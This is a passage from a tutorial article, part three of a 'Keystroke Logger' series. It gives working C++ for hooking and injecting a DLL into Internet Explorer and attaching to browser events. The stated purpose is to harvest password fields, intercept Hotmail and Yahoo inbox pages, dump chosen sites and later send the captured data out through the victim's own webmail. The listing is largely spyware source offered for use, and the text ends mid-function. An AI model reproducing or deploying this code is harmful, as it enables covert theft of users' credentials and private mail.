Keystroke Logger and More, Part 3

   

Environment: VC6+SP5 or 7, Win 2K/XP/2003 ONLY!, MS PlatformSDK, Microsoft XML Parser (MSXML)

Note: This is the third article of the “KeyStroke Logger and More” series. For consistency, it is highly recommended that you read the first and second articles of this series before continuing with this one. To fully experiment with the functionality of the logger, you need an active Internet connection and e-mail accounts on www.hotmail.com and www.yahoo.com, so that you can see the interception of an on-line e-mail system.

Part 4—It Is Time for IE

IE Hook In A Nut Shell

After reading the first two articles, I assume you are at home with the mechanism of hooking under the GUI Windows environment and with inter-process communication. Whether you hook into a password edit box or into MSN Messenger, the basic idea is to inject your DLL into the target process and interact with the windows residing in that thread (it is rare for GUI windows to reside in multiple threads in a real-world application, although you can do that if you do not mind the chore of thread message redirection).

When you plan to hook into MS Internet Explorer (IE), you will find that the previous method does not work at all, because MS wraps the browser tightly into a collection of COM objects called MSHTML (DHTML or whatever; I do not care); to the outside, these objects expose only a few dozen COM interfaces. One of my previous articles, “Super Password Spy++” (Jan 2003, www.CodeGuru.com), introduced a tool with which a user could peek into the password area inside an IE page as well as a common password edit box. Because it is a tool for humans, the user takes care of locating the password area with the mouse. A logger running in the background, however, cannot count on anyone telling it where the password area is. So, the logger must at least do the following to monitor IE correctly:

  1. Find any running IE instance (actually, all Web browser hosts contain an “Internet Explorer_Server” window; it may be inside Outlook Express, for example).
  2. Inject your DLL into each IE instance (same thread) once and only once (refer to the first article for the reason).
  3. Obtain a DHTML COM interface pointer from the IE window handle. There are two steps: first, from the window handle to IHTMLDocument2; then, from the latter to IWebBrowser2.
  4. Advise your IDispatch-based interface to the DWebBrowserEvents2 connection point to get notifications (events) from IE. This is the core of all our work here. Without knowing when IE navigates to another URL, how could you get information from IE dynamically? Do not tell me you want to count on polling; it consumes a lot of CPU time (causing a perceivable performance hit) and will sooner or later crash IE with a GP fault, because polling cannot be synchronized with the browser.
  5. Whenever IE is about to navigate to a new URL, parse the page through the DHTML hierarchy.
  6. Correctly handle the outdated COM pointer. Release the old one and obtain a fresh pointer.
  7. Act on what the parsed page contains:
    a. If a password area is available inside the page, read the nearby HTML elements just as we did for the password edit box in the first article.
    b. If the URL belongs to an on-line mail page, parse the page. This is partly a psychology problem and partly an engineering problem: you have to guess the thinking pattern of the Web page developers and follow it in the parsing. There is no panacea here.
    c. If the URL belongs to any interesting pre-defined site, dump the page.
  8. Inter-process communication: transfer the data to the logger, taking special care with memory management (for example, buffer size checks) and exception handling.
  9. Depending on the outcome of Step 7:
    a. If 7b is true, re-use the on-line mail system to transfer the intercepted data outside (see the following articles in this series).
    b. If 7c is true, more effort is needed to parse certain URLs and transfer the data.
  10. Handle exit gracefully and release the COM pointers.

Among all steps, Steps 4, 6, 7b, 8, and 9a are crucial and error-prone. Let’s preview the steps one by one:

Steps 1 and 2 are not a big deal; you will feel at home if you have read through my first two articles, because the approach is so similar. This time you simply hook “Internet Explorer_Server” instead of “EDIT”, “MSNMSBLClass”, or whatever. You can find out how to perform Step 3 in my article “Super Password Spy++” and in the C++ Q/A column of the June 2001 MSDN Magazine. Step 4 requires you either to derive a class from IDispatch in C++ or to use a structure that mimics the vtable of IDispatch in plain C. I chose the former because it takes fewer lines of code, but you can still use the latter. Technically, they are the same.

Step 5 is not difficult in theory. In a word, you enumerate the whole DHTML hierarchy on the page and search for some pre-defined keywords. As with Step 4, the problem is that MSDN’s help in this field is not clear, or rather, too succinct, with little in the way of C++ samples (most are script code samples). Step 6 sounds hackneyed, but you will soon feel the pain of controlling something that is out of your control. I bet that, unless you are a member of the MS IE development team, your should-be-OK code will fail miserably at first: a pointer that worked great in the previous loop now points to an invalid address, and the target IE crashes, naturally, because your pointer plays with fire inside its process space. More annoying problems rear their ugly heads one by one. Some pages are so huge that you must check every memory copy to ensure your code does not screw up the remote process…
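The advice to check every memory copy can be illustrated with a small, portable sketch. BoundedCopy is a hypothetical helper name, not part of the article's source; it only shows the general idea of clamping a copy to the destination size and always terminating the result.

```cpp
#include <cstddef>
#include <cstring>

// Hypothetical helper (not from the article's source).
// Copies at most dstSize - 1 bytes from src into dst and always
// writes a terminating '\0'. Returns the number of bytes copied,
// not counting the terminator.
size_t BoundedCopy(char* dst, size_t dstSize,
                   const char* src, size_t srcLen)
{
    if (dst == 0 || dstSize == 0)
        return 0;                       // nowhere to write
    size_t n = 0;
    if (src != 0)
        n = (srcLen < dstSize - 1) ? srcLen : dstSize - 1;
    if (n != 0)
        std::memcpy(dst, src, n);       // never exceeds dstSize - 1
    dst[n] = '\0';
    return n;
}
```

With an 8-byte buffer and a 10-byte source, the helper copies 7 bytes and terminates the buffer instead of overrunning it.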

When you reach Step 7, you also need some sense for choosing the page elements from the sea of HTML. In this article I pick only www.hotmail.com and www.yahoo.com as interception samples of an on-line mail system. MS seems to manage and develop its global MSN network more systematically; that is, the Hotmail account pages opened by American and Japanese users have the same layout. Note that I am not saying the Hotmail pages of all languages are the same. As a result, our code example runs well on the local MSN pages of various countries. Yahoo!, on the other hand, seems to leave page development to each country’s Yahoo! subsidiary. For example, the Yahoo! mail login page is “http://mail.yahoo.com/?.intl=*” when you use www.yahoo.com (Note: I use the DOS-like wildcards * and ? in URLs to stand for garbage characters), whereas its Japanese counterpart is “http://mail.yahoo.co.jp/*”.

If this still makes some sense, the rest of the story is really funny. The “Inbox” page of US Yahoo! is “http://*.mail.yahoo.com/ym/ShowFolder?rb=Inbox&*”, which at least contains the keyword “Inbox”. Yahoo! Japan’s “Inbox” page, however, is “http://jp.*.mail.yahoo.co.jp/ym/login?.rand=*”. Sounds crazier than “Rand,” doesn’t it? It does not stop there: the layouts of the two “Inbox” pages are completely different, with a different number of tables, a different number of table cells, and so forth. In the end, Japanese readers will have to modify my code if they want to apply the program to Yahoo! Japan. But do not get me wrong. Most of the modification is just changing the URL wildcard pattern and the DHTML element enumeration parameters accordingly (for example, the mail list uses six table rows here but maybe five there, so you change the number 6 to 5 in the code, and so on); the basic framework stays the same, which is good news.
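For readers unfamiliar with DOS-like wildcards, the matching rule used in the URL patterns above can be sketched as follows. WildcardMatch is a hypothetical name chosen for this illustration, and the sample URL in the usage note is made up; the article's own matcher is not shown in this part and may differ.

```cpp
#include <string>

// Hypothetical helper (not from the article's source).
// '*' matches any run of characters, including an empty one;
// '?' matches exactly one character; everything else must be equal.
bool WildcardMatch(const std::string& pattern, const std::string& text)
{
    const std::string::size_type npos = std::string::npos;
    std::string::size_type p = 0, t = 0;
    std::string::size_type starP = npos, starT = 0;

    while (t < text.size())
    {
        if (p < pattern.size() && pattern[p] == '*')
        {
            starP = p++;        // remember the star, try an empty match
            starT = t;
        }
        else if (p < pattern.size() &&
                 (pattern[p] == '?' || pattern[p] == text[t]))
        {
            ++p;                // one character consumed on both sides
            ++t;
        }
        else if (starP != npos)
        {
            p = starP + 1;      // backtrack: let the last star eat
            t = ++starT;        // one more character of the text
        }
        else
        {
            return false;
        }
    }
    while (p < pattern.size() && pattern[p] == '*')
        ++p;                    // trailing stars match the empty rest
    return p == pattern.size();
}
```

Under this rule, a made-up URL such as "http://us.f1.mail.yahoo.com/ym/ShowFolder?rb=Inbox&x=1" matches the US pattern "http://*.mail.yahoo.com/ym/ShowFolder?rb=Inbox&*", while it does not match "http://mail.yahoo.co.jp/*". Note that a literal '?' in a URL is also matched by the '?' wildcard, because the wildcard accepts any single character.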

Step 8 will be discussed with the code listing below. Step 9 will be covered in later articles of this series. Step 10 seems to be another piece of hackneyed stuff, but I think quite a few people will code like this:

  //Inside the DLL injected into the IE
  CComPtr<IHTMLDocument2> lpHTMLDocument2;
  //some operation
  lpHTMLDocument2->Release();
  //Oops, you crash IE in the last minute...

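The problem is not only the proper usage of CComPtr, but also a latent bug inside the ATL smart pointer. Refer to the reference list for more detail. The correct usage is .Release() instead of ->Release(), by the way: ->Release() drops the reference behind the smart pointer's back, so its destructor later releases the same interface a second time.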
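The difference between the two calls can be shown without ATL at all. The following is a toy model only: ToyObject and ToyPtr are hypothetical stand-ins for a COM object and a CComPtr-like smart pointer, written for this illustration, and they do not reproduce ATL's real implementation.

```cpp
// Toy stand-in for a COM object: it only counts references.
struct ToyObject
{
    long refs;
    ToyObject() : refs(1) {}            // one reference held by "the browser"
    long AddRef()  { return ++refs; }
    long Release() { return --refs; }   // a real object deletes itself at 0
};

// Toy stand-in for a smart pointer that owns one reference.
struct ToyPtr
{
    ToyObject* p;
    explicit ToyPtr(ToyObject* raw) : p(raw) { if (p) p->AddRef(); }
    ~ToyPtr() { Release(); }
    ToyObject* operator->() const { return p; }
    // Dot call: give up the owned reference AND forget the pointer.
    void Release()
    {
        if (p) { ToyObject* t = p; p = 0; t->Release(); }
    }
};

// Returns the reference count left after the smart pointer has died.
long CountAfter(bool useArrow)
{
    ToyObject obj;                      // refs == 1
    {
        ToyPtr sp(&obj);                // refs == 2
        if (useArrow)
            sp->Release();              // refs == 1, sp still "owns" one
        else
            sp.Release();               // refs == 1, sp owns nothing now
    }                                   // arrow case: destructor releases again
    return obj.refs;
}
```

In this model CountAfter(false) leaves the count at 1, which is the browser's own reference, while CountAfter(true) leaves it at 0: the reference that belonged to the host has been taken away. In a real process that is the point where the host's next use of the object crashes.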

Some Things You Need to Know to Work with the DHTML Model Inside IE

Relationship between DHTML COM object and GUI Windows:

To make coding life a little easier when coping with the parsing of a special page, I made a small helper program called “HtmlPeeker”. It shows how to enumerate the DHTML hierarchy, dump elements, and parse a table cell by cell. It not only helps in writing the parser code in my program, but also helps readers understand the code inside the more advanced IE injection DLL. (In the real world, a lot of pages use many nested tables to keep their format or visual effect, so finding the proper cell is a “mission impossible” without this knowledge.) The following code shows how to dump some frequently used HTML elements: button, textarea, and combobox:

#pragma warning(disable : 4192)
#pragma warning(disable : 4146)
#import <mshtml.tlb>    //Internet Explorer 4+

#include <Atlbase.h>    //to use CComVariant

//all err-handlers are omitted to save space

//m_pHtmlView is CHtmlView on the left panel

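LPDISPATCH pDocument = m_pHtmlView->GetHtmlDocument();
//The smart pointer does its own QueryInterface/AddRef
MSHTML::IHTMLDocument2Ptr spHtmlDocument(pDocument);
//GetHtmlDocument returned an AddRef'ed pointer; give it back
if(pDocument) pDocument->Release();
//Smart pointer, so the collection is released automatically
MSHTML::IHTMLElementCollectionPtr pCollection;
spHtmlDocument->get_all(&pCollection);
long len = 0;
pCollection->get_length(&len);
for(int i = 0; i < len; i++)
{
  //item() returns a smart pointer; hold the result in one so
  //the element stays alive while we query it
  IDispatchPtr lpItem = pCollection->item(CComVariant(i),
                                          CComVariant(i));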
  //Parse Button, Input, Check, Radio
  MSHTML::IHTMLInputElementPtr lpElement;
  HRESULT hr = lpItem->QueryInterface(&lpElement);
  if(SUCCEEDED(hr))
  {

    _bstr_t name  = lpElement->Getname();
    _bstr_t type  = lpElement->Gettype();
    _bstr_t value = lpElement->Getvalue();
    //I use MFC Framework, so.. make it simple
    CString strName  = (LPTSTR)name;
    CString strType  = (LPTSTR)type;
    CString strValue = (LPTSTR)value;
    CString str      = _T("\r\n") + strName + _T(" $$$ ")
                                  + strType + _T(" $$$ ")
                                  + strValue;
    //Write to right panel.....
    //No SysFreeString here: each _bstr_t frees its own BSTR,
    //so freeing it by hand would be a double free
  }

  //Parse TextArea
  MSHTML::IHTMLTextAreaElementPtr lpArea;
  hr = lpItem->QueryInterface(&lpArea);
  if(SUCCEEDED(hr))
  {
    _bstr_t name  = lpArea->Getname();
    _bstr_t type  = lpArea->Gettype();
    _bstr_t value = lpArea->Getvalue();

    CString strName  = (LPTSTR)name;
    CString strType  = (LPTSTR)type;
    CString strValue = (LPTSTR)value;
    CString str      = _T("\r\n") + strName + _T(" $$$ ")
                                  + strType + _T(" $$$ ")
                                  + strValue;
    //Write to right panel .....
    //No SysFreeString here: each _bstr_t frees its own BSTR,
    //so freeing it by hand would be a double free

  }

  //Parse Combo --
  // NOTE: Sometimes Combo is REALLY WINDOWS inside a page
  MSHTML::IHTMLSelectElementPtr lpCombo;
  hr = lpItem->QueryInterface(&lpCombo);
  if(SUCCEEDED(hr))
  {
    long len;
    lpCombo->get_length(&len);
    CString str = _T("\r\n-->Options Starts\r\n");
    m_pEditView->SendMessage(EM_SETSEL, -1, -1);
    m_pEditView->SendMessage(EM_REPLACESEL, 0,
                             (LPARAM)(LPCTSTR)str);
    for(int i = 0; i < len; i++)
    {
      //hold the returned smart pointer so the option stays alive
      IDispatchPtr lpItem = lpCombo->item(CComVariant(i),
                                          CComVariant(i));
      MSHTML::IHTMLOptionElementPtr lpOption;
      hr = lpItem->QueryInterface(&lpOption);
      if(SUCCEEDED(hr))
      {
        BSTR name = NULL;
        lpOption->get_text(&name);
        _bstr_t value = lpOption->Getvalue();
        VARIANT_BOOL selected = VARIANT_FALSE;
        lpOption->get_selected(&selected);

        //CString converts from the wide BSTR in ANSI builds too
        CString strName(name);
        CString strValue = (LPTSTR)value;
        str = _T("\r\n") + strName + _T(" $$$ ")
                         + strValue;
        if(selected == VARIANT_TRUE)
        {
          str += _T(" $$$ Selected");
        }
        //Write to right panel .....
        //Free Memory!!! Only the raw BSTR is ours to free;
        //the _bstr_t value frees itself
        ::SysFreeString(name);
      }
    }
    str = _T("-->Options Ends\r\n");
    m_pEditView->SendMessage(EM_SETSEL, -1, -1);
    m_pEditView->SendMessage(EM_REPLACESEL, 0,
                                (LPARAM)(LPCTSTR)str);
  }
  }

I will not repeat how to decide whether or not a page contains a password edit box. If you are not familiar with this part of the code, go to my previous article, “Super Password Spy++”, for the code excerpt. There you will also find the code that gets the IHTMLDocument2 pointer from the browser control window handle. The following figure shows the infrastructure of the IE COM objects:

Figure 3.1: Interaction of MSHTML COM object.

Note: It is somewhat different from the figure in the C++ Q/A column of the June 2001 MSDN Magazine.

From this figure, you can see that from any one of these objects you can reach another through a Windows message or a COM method. Please make sure to read the C++ Q/A column of the June 2001 MSDN Magazine, and note that I DO NOT think IServiceProvider can provide the “Document Window Handle” directly, as the figure in that column shows. Even if the figure is right, IOleWindow must be queried first and then its GetWindow called; and even then, I am not sure which window handle you get. For the sake of developers who are new to MSHTML, here are two more figures that I think will help your understanding. The first is the inside-out COM object layout of an IE instance, a typical application using MSHTML. The second shows the visual area corresponding to these COM interfaces. Please note again that I cannot draw all interfaces in one picture.

Figure 3.2: Inside out COM Object layout of Internet Explorer

Figure 3.3: Visual Field Corresponding COM Object

You can use the “OLE View” tool to confirm that IWebBrowser2 is derived from IWebBrowserApp, and IWebBrowserApp from IWebBrowser. These redundant interfaces create nothing but a confusing “Interface Hell”, which is more serious than “DLL Hell” nowadays. Plus, IWebBrowser2 contains status bar and toolbar-related methods, which are just a farce in most cases. If I just use an MS Web browser control on a dialog, why bother creating a status bar or toolbar? (In fact, these methods do nothing there.) From my experience, I would rather regard IWebBrowser2 as a physical window shared with IHTMLDocument2 (the purple rectangle in the above figure). Take the following two figures from SPY++.

Figure 3.4: Windows layout of an IE

Note: Current Page has no Embedded ActiveX

Figure 3.5: Windows layout of a dialog hosting two Web browsers; one of them has finished navigating.

This is my suggestion to new developers:

  1. First, forget IWebBrowser and IWebBrowserApp. All you need is IWebBrowser2 and the IHTMLxxx interfaces.
  2. Second, forget any methods related to the status bar, toolbar, and so on. If you use a Web browser control on a dialog or a form view, create your own bars.
  3. Finally, think of the DHTML document and the Web browser as sharing the same GUI window to display content to the user.

So, go back to these two figures. In IE, the dead IWebBrowserApp corresponds to the IE main window, whose class name is “IEFrame”, while IWebBrowser2 and IHTMLDocument2 correspond to the “Internet Explorer_Server” window. One more thing: you cannot prevent IE from navigating somewhere when it is launched. As a result, IWebBrowser2 will navigate somewhere and a DHTML document object will be constructed inside.

On the other hand, look at the figure showing a dialog hosting two Web browsers. A Web browser does not have a document when it starts up; it gets one only after it navigates somewhere. KB Q249232, “HOWTO: Get IHTMLDocument2 from a HWND”, confirms this by stating that “Internet Explorer_Server” is the document window. Note again (I have to ask you to take care again and again because there are so many pitfalls here): IHTMLDocument2 is represented by the “Internet Explorer_Server” window, but NOT ALL “Internet Explorer_Server” windows embody an IHTMLDocument2!!! Go to online MSDN and search for “shell docobject view”; you will find an article called “A View of Internals”, extracted from “Instant DHTML Scriptlets” (Wrox 1997) and written in the IE 4.0 era. It says: “In fact, if the page hosts some windowed ActiveX controls, these windows would all be children of the server window of class ‘Internet Explorer_Server’.” I cannot find such an ActiveX control, but I can create one scenario: insert an ATL HTML control into an HTML page, and the window layout looks like the following figure:

Figure 3.6: An IE hosting a page that includes an ATL HTML control. Note that nested “Internet Explorer_Server” (0018115A), which is hosted by Ax.

Browser Event Handling:

Let’s continue with how to use this IHTMLDocument2 pointer. Just as when we hooked a password edit box and MSN Messenger, we need a way to be notified when the human user or an embedded script navigates the browser. DHTML provides an event interface, DWebBrowserEvents2, through which events are fired. When I started to write this program, I tried to use the OnSubmit event because I knew that a password element usually resides on a form, and sooner or later the user will push the Submit button to go on. But, after a few tries, I changed my mind, because linking to a form dynamically is not only complicated but also useless for pages without a form, such as your Hotmail Inbox page. So, I chose the BeforeNavigate2 event; this event is fired before any URL change, and I filter the events for the URLs I am interested in. I made a simple C++ class, CInterceptEvt, to do the interception work, as in the following:

//Header File 

#include <Exdisp.h>    //to use IWebBrowser2
#include "ComDef.h"
class CInterceptEvt : public IDispatch
{

public:
  // IUnknown
  ULONG __stdcall AddRef();
  ULONG __stdcall Release();
  HRESULT __stdcall QueryInterface(REFIID iid, void** ppv);

  // IDispatch
  HRESULT __stdcall GetTypeInfoCount(UINT* pCountTypeInfo);
  HRESULT __stdcall GetTypeInfo(UINT iTypeInfo, LCID lcid,
                                ITypeInfo** ppITypeInfo);
  HRESULT __stdcall GetIDsOfNames(REFIID riid,
                                  LPOLESTR* rgszNames,
                                  UINT cNames, LCID lcid,
                                  DISPID* rgDispId);
  HRESULT __stdcall Invoke(DISPID dispIdMember, REFIID riid,
                           LCID lcid, WORD wFlags,
                           DISPPARAMS* pDispParams,
                           VARIANT* pVarResult,
                           EXCEPINFO* pExcepInfo,
                           UINT* puArgErr);

private:
  ULONG m_cRef;
  ITypeInfo* m_pTypeInfo;

public:
  // CInterceptEvt will be a global variable in DLL, so here
  // is called only once, which also means you need the C++ run
  // time library for global initialization of a C++ constructor
  CInterceptEvt() : m_cRef(1), m_pTypeInfo(NULL)
  {
    for(int i =0; i < MAX_BROWSER; i++)
    {
      m_ppBrowser[i] = NULL;
      m_ppConnectionPoint[i] = NULL;
      m_dwCookie[i] = 0;
    }
  }
  ~CInterceptEvt() {}
  BOOL Init(void);

  //Connect to individual IE window
  void SetSource(IWebBrowser2Ptr pBrowser, DWORD dwIndex);
  void ExitEvents(DWORD dwIndex);
  void ConnectEvents(DWORD dwIndex);

  IWebBrowser2Ptr m_ppBrowser[MAX_BROWSER];
  IConnectionPoint* m_ppConnectionPoint[MAX_BROWSER];
  DWORD m_dwCookie[MAX_BROWSER];
};

//CPP File
ULONG CInterceptEvt::AddRef()
{
  return ++m_cRef;
}
ULONG CInterceptEvt::Release()
{
  // The only instance is a global object, not a heap object,
  // so it must never "delete this"; just keep the count honest.
  if(m_cRef > 0) --m_cRef;
  return m_cRef;
}
HRESULT CInterceptEvt::QueryInterface(REFIID riid, void** ppv)
{
  if(riid == IID_IUnknown)
    *ppv = (IUnknown*)this;
  else if(riid == IID_IDispatch)
    *ppv = (IDispatch*)this;
  else
  {
    *ppv = NULL;
    return E_NOINTERFACE;
  }
  AddRef();
  return S_OK;
}

BOOL CInterceptEvt::Init(void)
{
  return TRUE;
}

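HRESULT CInterceptEvt::GetTypeInfoCount(
  UINT* pCountTypeInfo)
{
  // No type information is offered; events arrive through Invoke
  if(pCountTypeInfo) *pCountTypeInfo = 0;
  return S_OK;
}

HRESULT CInterceptEvt::GetTypeInfo(UINT iTypeInfo, LCID lcid,
                                   ITypeInfo** ppITypeInfo)
{
  if(ppITypeInfo) *ppITypeInfo = NULL;
  return E_NOTIMPL;
}

HRESULT CInterceptEvt::GetIDsOfNames(REFIID riid,
                                     LPOLESTR* rgszNames,
                                     UINT cNames, LCID lcid,
                                     DISPID* rgDispId)
{
  // The sink is only called by DISPID, never by name
  return E_NOTIMPL;
}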
//
void CInterceptEvt::ConnectEvents(DWORD dwIndex)
{
  if(m_ppBrowser[dwIndex] == NULL) return;
  IConnectionPointContainer* pCPContainer = NULL;
  // Step 1: Get a pointer to the connection point container
  HRESULT hr = m_ppBrowser[dwIndex]->QueryInterface(
               IID_IConnectionPointContainer,
               (void**)&pCPContainer);
  if (FAILED(hr))
  {
    ::ReportErr(_T("ConnectEvents"));
    return;
  }

  // Step 2: Find the connection point
  hr = pCPContainer->FindConnectionPoint(DIID_DWebBrowserEvents2,
                     &m_ppConnectionPoint[dwIndex]);
  if (SUCCEEDED(hr))
  {
    // Step 3: If everything goes well, Advise
    hr = m_ppConnectionPoint[dwIndex]->
         Advise(this, &m_dwCookie[dwIndex]);
  }

  // The container is no longer needed on any path
  pCPContainer->Release();
  if (FAILED(hr)) ::ReportErr(_T("ConnectEvents"));
}

void CInterceptEvt::ExitEvents(DWORD dwIndex)
{
  // Step 5: Unadvise
  if (m_ppConnectionPoint[dwIndex])
  {
    HRESULT hr = m_ppConnectionPoint[dwIndex]->
                 Unadvise(m_dwCookie[dwIndex]);
  }
}

void CInterceptEvt::SetSource(IWebBrowser2Ptr pBrowser,
                              DWORD dwIndex)
{
  m_ppBrowser[dwIndex] = pBrowser;
}

HRESULT CInterceptEvt::Invoke(DISPID dispidMember,
                              REFIID riid, LCID lcid, WORD wFlags,
                              DISPPARAMS* pDispParams,
                              VARIANT* pvarResult,
                              EXCEPINFO* pExcepInfo,
                              UINT* puArgErr)
{
  if (!pDispParams)
    return E_INVALIDARG;
  //I am afraid you have to read MSDN carefully and
  //experiment a little before coding other events
  switch (dispidMember)
  {
  // rgvarg holds the arguments in reverse order.
  // The parameters for this DISPID are as follows:
  // [0]: Cancel flag               - VT_BYREF|VT_BOOL
  // [1]: HTTP headers              - VT_BYREF|VT_VARIANT
  // [2]: Address of HTTP POST data - VT_BYREF|VT_VARIANT
  // [3]: Target frame name         - VT_BYREF|VT_VARIANT
  // [4]: Option flags              - VT_BYREF|VT_VARIANT
  // [5]: URL to navigate to        - VT_BYREF|VT_VARIANT
  // [6]: An object that evaluates to the top-level or frame
  //      WebBrowser object corresponding to the event.
  // [6]: type = 9 VT_DISPATCH
  case DISPID_BEFORENAVIGATE2:
    //rgvarg[6] is read below, so seven arguments are required
    if (pDispParams->cArgs >= 7 &&
        pDispParams->rgvarg[6].vt == VT_DISPATCH &&
        pDispParams->rgvarg[6].pdispVal != NULL)
    {
      //Got browser control's interface,
      //make confirmation
      IDispatch *pDispVal = pDispParams->rgvarg[6].pdispVal;
      for(int i = 0; i < MAX_BROWSER; i++)
      {
        //compare these 2 COM interfaces' IUnknown
        if(m_ppBrowser[i])
        {
          IUnknown* pUnk1 = NULL;
          IUnknown* pUnk2 = NULL;
          HRESULT hr1 = m_ppBrowser[i]->QueryInterface(
                        IID_IUnknown, (void**)&pUnk1);
          HRESULT hr2 = pDispVal->QueryInterface(
                        IID_IUnknown, (void**)&pUnk2);
          BOOL bSame = SUCCEEDED(hr1) && SUCCEEDED(hr2) &&
                       pUnk1 == pUnk2;
          //QueryInterface AddRef'ed both pointers
          if(pUnk1) pUnk1->Release();
          if(pUnk2) pUnk2->Release();
          if(bSame)
          {
            Trigger(i);
            //Got it, check URL, if within our interest
            //parse HTML page and dump info from it!!!
            break;
          }
        }
      }
    }
    break;
  default:
    break;
  }
  return S_OK;
}
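The argument table in the Invoke comments follows the IDispatch convention that DISPPARAMS::rgvarg stores the arguments in reverse order of declaration. The small, portable sketch below shows the index arithmetic; RgvargIndex is a hypothetical helper name used only for this illustration and does not appear in the article's source.

```cpp
// Hypothetical helper (not from the article's source).
// Maps the 0-based position of a parameter in the event's
// declaration to its index inside DISPPARAMS::rgvarg, given that
// cArgs arguments were passed. Returns -1 when the parameter is
// not present, so the caller never reads past the array.
int RgvargIndex(unsigned cArgs, unsigned declaredPos)
{
    if (declaredPos >= cArgs)
        return -1;
    return (int)(cArgs - 1 - declaredPos);
}
```

BeforeNavigate2 declares seven parameters, starting with the browser object and ending with the Cancel flag. With cArgs equal to 7, RgvargIndex(7, 0) is 6 (the browser object) and RgvargIndex(7, 6) is 0 (the Cancel flag), which agrees with the table. With only six arguments there is no rgvarg[6] at all, so any guard in front of that read has to require at least seven.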

Code, Code, and Code:

Following is the code of the DLL that is injected into the IE process space.

// Forward references
LRESULT WINAPI GetMsgProc(int nCode, WPARAM wParam,
                          LPARAM lParam);
LRESULT CALLBACK CallWndProc(int nCode, WPARAM wParam,
                             LPARAM lParam) ;

#pragma data_seg("Shared")
//Post Hook Handle 
HHOOK g_hBrowserPostHook[MAX_BROWSER] = {NULL,...};
//Send Hook Handle
HHOOK g_hBrowserSendHook[MAX_BROWSER] = {NULL,...};
//Tracked Browser
HWND g_hBrowserWnd[MAX_BROWSER] = {NULL,...};
//Tracked Active Browser
//(Which Contents Has Never Been Spied Even Once)
HWND g_hActiveBrowserWnd[MAX_BROWSER] = {NULL,...};
//IHTMLDocument2 pointer. Note: The machine must be running Win2K+
MSHTML::IHTMLDocument2Ptr g_lpHTMLDocument2
  [MAX_BROWSER] = {NULL, ..., NULL};
//IWebBrowser2 pointer
IWebBrowser2Ptr g_lpWeb2[MAX_BROWSER] = {NULL,...};
//Global Event Interceptor Class
CInterceptEvt g_event;
//Tracked Browser Thread
DWORD g_idBrowserThread[MAX_BROWSER] = {0, ..., 0};
//Browser Page State -- Page, PreDefined ...etc
DWORD g_dwBrowserState[MAX_BROWSER] = {0, ..., 0};
#pragma data_seg()
// Instruct the linker to make the Shared section
// readable, writable, and shared.
#pragma comment(linker, "/section:Shared,rws")
// Nonshared variables
HINSTANCE g_hinstDll = NULL;

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
)
{
  switch (ul_reason_for_call)
  {
  case DLL_PROCESS_ATTACH:
    g_hinstDll = (HINSTANCE)hModule;
    break;
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
    break;
  }
  return TRUE;
}

//The Second Browser Window in the same thread
//Will Not Set A New Hook
BOOL WINAPI InitBrowserLink(HWND hBrowser)
{
  DWORD td = ::GetWindowThreadProcessId(hBrowser, NULL);
  //Check if this thread has been hooked
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_idBrowserThread[i] == td)    //no need to hook
    {
      //Set Hook To Previous Value
      DWORD dwIndex = InsertBrowserHwnd(hBrowser);
      if(dwIndex == (UINT)-1) return FALSE;
      g_hBrowserSendHook[dwIndex] = g_hBrowserSendHook[i];
      g_hBrowserPostHook[dwIndex] = g_hBrowserPostHook[i];
      g_idBrowserThread[dwIndex]  = g_idBrowserThread[i];
      return TRUE;
    }
  }

  //First Window On This Thread, Hook It
  DWORD dwIndex = InsertBrowserHwnd(hBrowser);
  if(dwIndex == (UINT)-1) return FALSE;
  g_idBrowserThread[dwIndex] = ::GetWindowThreadProcessId(
                                 hBrowser, NULL);

  // Install the hook on the specified thread
  g_hBrowserSendHook[dwIndex] = SetWindowsHookEx(
                                WH_CALLWNDPROC,
                                (HOOKPROC) CallWndProc,
                                g_hinstDll,
                                g_idBrowserThread[dwIndex]);
  if(g_hBrowserSendHook[dwIndex] == NULL) err-handler;

  g_hBrowserPostHook[dwIndex] = SetWindowsHookEx(
                                WH_GETMESSAGE, GetMsgProc,
                                g_hinstDll,
                                g_idBrowserThread[dwIndex]);
  if(g_hBrowserPostHook[dwIndex] == NULL) err-handler;
  PushActiveBrowser(hBrowser);    //Remember this new guy

  return TRUE;
}

BOOL WINAPI ExitBrowserLink(HWND hBrowser)
{
  DWORD dwIndex = QueryBrowserHwndIndex(hBrowser);
  if(dwIndex == (UINT)-1) return FALSE;

  DWORD tid = ::g_idBrowserThread[dwIndex];
  DWORD dwThreadNum = 0;
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_idBrowserThread[i] == tid) dwThreadNum++;
  }

  //If the thread is used by other browser, do not unhook it
  if(dwThreadNum > 1)
  {
    //release the COM object linked with the browser
    AntiLinkCom(dwIndex);
    g_hBrowserWnd[dwIndex]      = NULL;
    g_hBrowserSendHook[dwIndex] = NULL;
    g_hBrowserPostHook[dwIndex] = NULL;
    g_idBrowserThread[dwIndex]  = 0;
    return TRUE;
  }

  //the last browser running on the thread ready to quit
  BOOL b = UnhookWindowsHookEx(g_hBrowserSendHook[dwIndex]);
  if(!b)  err-handler;
  UnhookWindowsHookEx(g_hBrowserPostHook[dwIndex]);
  AntiLinkCom(dwIndex);       //unlink the com object
  g_hBrowserWnd[dwIndex]      = NULL;
  g_hBrowserSendHook[dwIndex] = NULL;
  g_hBrowserPostHook[dwIndex] = NULL;
  g_idBrowserThread[dwIndex]  = 0;

  return TRUE;
}

DWORD InsertBrowserHwnd(HWND hBrowser)
{
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_hBrowserWnd[i] == NULL)
    {
      g_hBrowserWnd[i] = hBrowser;
      return i;
    }
  }
  return (UINT)-1;
}

//Query hBrowser's index in g_hBrowserWnd, NOT used in Service
DWORD QueryBrowserHwndIndex(HWND hBrowser)
{
  if(hBrowser == NULL) return (UINT)-1;
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_hBrowserWnd[i] == hBrowser) return i;
  }
  return (UINT)-1;
}

//When InitBrowserLink, Set Active Browser, link with event class
BOOL PushActiveBrowser(HWND hBrowser)
{
  for(int i = 0; i < MAX_BROWSER; i++)
  {
    if(g_hActiveBrowserWnd[i] == NULL)
    {
      g_hActiveBrowserWnd[i] = hBrowser;
      //report success; returning the index i would read as
      //FALSE whenever slot 0 is used
      return TRUE;
    }
  }
